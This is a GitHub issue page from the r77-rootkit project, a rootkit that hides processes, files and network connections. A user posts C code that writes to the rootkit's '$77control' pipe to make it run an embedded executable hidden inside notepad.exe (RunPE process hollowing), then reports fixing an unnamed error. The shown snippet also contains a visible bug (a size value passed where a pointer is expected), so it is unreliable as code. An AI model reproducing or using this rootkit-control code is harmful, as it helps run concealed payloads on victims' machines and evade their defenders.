search

bytecode77 / r77-rootkit

Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.
https://bytecode77.com/r77-rootkit
BSD 2-Clause "Simplified" License
1.55k stars 383 forks source link

how to run a pe using control pipe? #36

Closed ghost closed 1 year ago

ghost commented 1 year ago

I've tried this using the examples provided. the PE is in resources

    HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (pipe != INVALID_HANDLE_VALUE)
    {
        LPBYTE pe;
        DWORD peSize;
        if (!GetResource(IDR_R72, "EXE", &pe, &peSize)) return 0;

        DWORD controlCode = CONTROL_USER_RUNPE;
        WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe";
        // Write control code (DWORD)
        DWORD bytesWritten;
        WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL);

        // Write the path for ShellExec (unicode string including null terminator)
        WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * 2, &bytesWritten, NULL);

        // Write arguments for size
        WriteFile(pipe, peSize, sizeof(DWORD), &bytesWritten, NULL);

        // Write arguments for bytes
        WriteFile(pipe, pe, peSize, &bytesWritten, NULL);

        CloseHandle(pipe);
}

but the PE does not execute.

ghost commented 1 year ago

nvm, found the error. Thanks